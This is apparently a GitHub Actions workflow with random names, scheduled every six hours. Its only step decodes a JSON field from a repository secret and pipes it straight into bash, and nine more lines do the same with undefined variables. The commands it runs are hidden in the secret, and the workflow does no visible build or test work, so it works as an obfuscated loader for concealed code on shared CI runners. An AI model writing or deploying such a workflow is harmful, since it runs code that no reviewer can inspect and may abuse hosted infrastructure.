name: weichanghui7164

on:
  workflow_dispatch:
  schedule:
    - cron: '39 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: weichanghui7164
        env:
          u79: ${{ secrets.u79 }}
        run: |
          echo $u79 | jq -r .dd281 | /bin/bash
          echo $yehp49291 | jq -r .qggx9016 | /bin/bash
          echo $ehi2 | jq -r .wgh7 | /bin/bash
          echo $kwenn18 | jq -r .kw588 | /bin/bash
          echo $aw9831 | jq -r .orea592 | /bin/bash
          echo $jxm901 | jq -r .cqyy43145 | /bin/bash
          echo $mjv5255 | jq -r .hbxon33842 | /bin/bash
          echo $grhy32 | jq -r .r39976 | /bin/bash
          echo $f3 | jq -r .qzsvr4798 | /bin/bash
          echo $nf022 | jq -r .exox5 | /bin/bash

